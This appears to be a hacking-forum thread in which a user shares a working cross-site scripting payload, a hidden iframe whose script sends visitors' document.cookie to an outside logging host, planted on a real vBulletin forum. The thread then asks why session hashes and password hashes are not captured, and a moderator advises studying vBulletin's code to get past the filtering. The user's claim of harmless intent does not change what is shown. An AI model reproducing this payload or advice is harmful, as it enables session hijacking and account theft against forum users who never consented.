
Logging vBulletin session cookies


ghost's Avatar

I've found an exploit on a vBulletin forum, I'm using an iframe to log the cookies…something like:

<iframe frameborder=0 src="" height=0 width=0 id="lol" name="lol"></iframe>
<script>
frames["lol"].location.href="http://www.xxxxxx.com/imagex/image.php?image=" + document.cookie;
</script>

So far so good, the strange thing when I'm checking my cookie data file is that it doesn't log the bbpassword, userid and session hash…which basically sucks big time, the only stuff it logs is:

imagevbulletin_collapse=; IDstack=,24036,,42160,; __utma=188577343.2387310957089858000.1224555432.1237116882.1237133536.756; _utmz=188577343.1237076987.752.22.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=xxxxxxx; ebNewBandWidth.forum.xxxxxxxxxxxx.com=2826:1236415128565; __utmb=188577343.91.10.1237133536; bblastvisit=1237133941; bblastactivity=0;

However when I visit the phishing page myself I do get those cookies except the session hash…wtf is going on?


AldarHawk's Avatar
The Manager

Sounds like your Phishing is not working :P

The iframe pass through must be dropping the cookie which is dependent in vB…looks to me like a classic cookie code that stops stuff like this from happening. Do you know the vB backend code?

If you read into this code you will then be able to see where your problem is arising from so you can surpass this problem, perhaps even drop it as it may not work.

Just my thoughts though.

BTW: What are you gaining from this Phishing scheme? Account passwords? What good does that do you? You have an account there already…If you are looking to gain administrative rights, what is that going to do for you? Just wondering your motives to this "hack".


ghost's Avatar

AldarHawk wrote: Sounds like your Phishing is not working :P

The iframe pass through must be dropping the cookie which is dependent in vB…looks to me like a classic cookie code that stops stuff like this from happening. Do you know the vB backend code?

If you read into this code you will then be able to see where your problem is arising from so you can surpass this problem, perhaps even drop it as it may not work.

Just my thoughts though.

Thanks, I'll take a look at the vBulletin code, didn't know it was actually possible to filter cookies from output.

AldarHawk wrote: BTW: What are you gaining from this Phishing scheme? Account passwords? What good does that do you? You have an account there already…If you are looking to gain administrative rights, what is that going to do for you? Just wondering your motives to this "hack".

When I output the cookie with alert(), there are three interesting cookies (session hash, bbpassword (md5), userid). I'm not going to do anything harmful as I like the board and visit it very often, just want to show the admin why it's a bad idea to allow html on a public forum. ;)


AldarHawk's Avatar
The Manager

zomgwtfbbq wrote: When I output the cookie with alert(), there are three interesting cookies (session hash, bbpassword (md5), userid). I'm not going to do anything harmful as I like the board and visit it very often, just want to show the admin why it's a bad idea to allow html on a public forum. ;)

Okay so this is a basic set up. It is not fully bad to allow HTML. It just needs to be filtered. sessionhash is nothing more than an SQL deposit with the given "session" code. This relates to the bbpassword() and userid() information. With all three you can gain a lot but I am guessing this is already thought of from vBulletin :) Anywho, glad you are starting to learn from this zomg :P